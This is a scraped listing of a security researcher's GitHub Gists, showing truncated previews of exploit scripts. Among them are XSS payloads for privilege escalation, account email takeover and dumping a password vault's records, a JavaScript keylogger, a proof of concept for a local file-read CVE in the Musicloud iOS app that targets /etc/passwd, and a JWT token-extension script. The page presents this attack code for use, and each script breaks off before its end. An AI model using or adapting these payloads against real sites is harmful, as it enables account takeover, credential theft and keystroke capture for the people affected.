Shawar Khan shawarkhanethicalhacker
shawarkhanethicalhacker
/ XSS_Privilege_Escalation.js
Created
August 4, 2019 14:04
Privilege escalation exploit code for XSS vulnerability that I have recently discovered.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // XSS Exploit code for Privilege Escalation | |
| // Author: Shawar Khan | |
| var woot = document.createElement('html'); | |
| fetch('https://vulnerablesite.com/settings',{credentials: 'include'}).then((resp) => resp.text()).then(function(data){ | |
| woot.innerHTML=data; | |
| var csrf_token = woot.getElementsByTagName('meta')[3]['content']; | |
| privilege_escalate(); |
shawarkhanethicalhacker
/ exptest.js
Created
April 24, 2019 20:07
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var keys = ''; | |
| document.onkeypress = function(e) { | |
| var get = window.event ? event : e; | |
| var key = get.keyCode ? get.keyCode : get.charCode; | |
| key = String.fromCharCode(key); | |
| keys += key;---- | |
| } | |
| window.setInterval(function(){ |
shawarkhanethicalhacker
/ Musicloud-exploit.py
Last active
February 17, 2019 07:44
[CVE-2019-8389] An exploit code for exploiting a local file read vulnerability in Musicloud v1.6 iOS Application
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Proof of concept for CVE-2019-8389 | |
| # Exploit author: Shawar Khan | |
| import sys | |
| import requests | |
| def usage(): | |
| print "Usage:\n\tpython musicloud_lfi.py 192.168.8.103 /etc/passwd\n" |
shawarkhanethicalhacker
/ token.py
Last active
January 28, 2019 11:15
A little automation for obtaining JWT token for a POC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # A sample code that obtains a permanent JWT token when provided a temporary JWT token | |
| import json | |
| import requests | |
| import sys | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| jwt_token=raw_input("Enter token > ") | |
| exploit_url = "https://secure.site.com:443/aapi/v1/authentications/token" | |
| exploit_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://www.site.com", "authorization": "Bearer "+str(jwt_token), "content-type": "application/json", "origin": "https://www.site.com", "Connection": "clos"} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert(1337) |
shawarkhanethicalhacker
/ email_change_exploit_xss.js
Created
September 14, 2018 20:57
This is a sample exploit for exploiting an XSS vulnerability that changes the user email. This bypasses some CSRF protections as the page was revoking the CSRF protections when refreshed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // a Simple XSS exploit for email change | |
| // Shawar Khan | |
| var dark_window = window.open('https://www.target.com/settings'); | |
| dark_window.addEventListener('load', | |
| function exploit_run(){ | |
| dark_window.document.body.getElementsByTagName('form')[0][2].value='[email protected]' // changes email | |
| dark_window.document.body.getElementsByTagName('form')[0][40].click() // clicks for submission |
shawarkhanethicalhacker
/ password_vault_exploit.js
Created
August 20, 2018 07:26
XSS Exploit code for retrieving passwords stored in a Password Vault
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Exploit Code by Shawar Khan | |
| var data_chunks = ''; | |
| // Capturing Records from API | |
| fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) { | |
| // Holds the records in as String | |
| var allrecords = data; | |
| // converting response to JSON |